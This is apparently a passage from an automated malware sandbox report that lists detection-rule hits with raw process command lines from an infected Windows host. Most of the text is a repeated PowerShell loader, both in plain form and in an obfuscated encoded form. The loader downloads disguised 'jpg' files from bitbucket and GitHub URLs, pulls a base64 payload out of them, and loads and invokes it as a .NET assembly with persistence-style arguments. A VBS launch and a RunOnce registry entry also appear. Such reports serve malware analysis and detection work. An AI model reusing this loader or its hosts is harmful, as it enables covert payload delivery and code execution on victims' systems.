s$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$
$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.IkIhcga/sdaolnwod/sfwqeqw/twqewqe/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = 
[Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startInde
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sodigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$
$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 675c87f6bfee1.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7248, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , ProcessId: 7360, ProcessName: wscript.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 675c87f6bfee1.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7248, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , ProcessId: 7360, ProcessName: wscript.exe
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 675c87f6bfee1.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7248, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , ProcessId: 7360, ProcessName: wscript.exe
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\GdGXG0bnxH.exe, ProcessId: 2404, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.IkIhcga/sdaolnwod/sfwqeqw/twqewqe/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = 
[Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startInde
        Source: Process started | Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 675c87f6bfee1.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7248, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , ProcessId: 7360, ProcessName: wscript.exe
        Source: Process started | Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 675c87f6bfee1.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7248, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" , ProcessId: 7360, ProcessName: wscript.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sodigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr
$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J

        Data Obfuscation

        barindex
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.IkIhcga/sdaolnwod/sfwqeqw/twqewqe/gro.tekcubtib', '0', 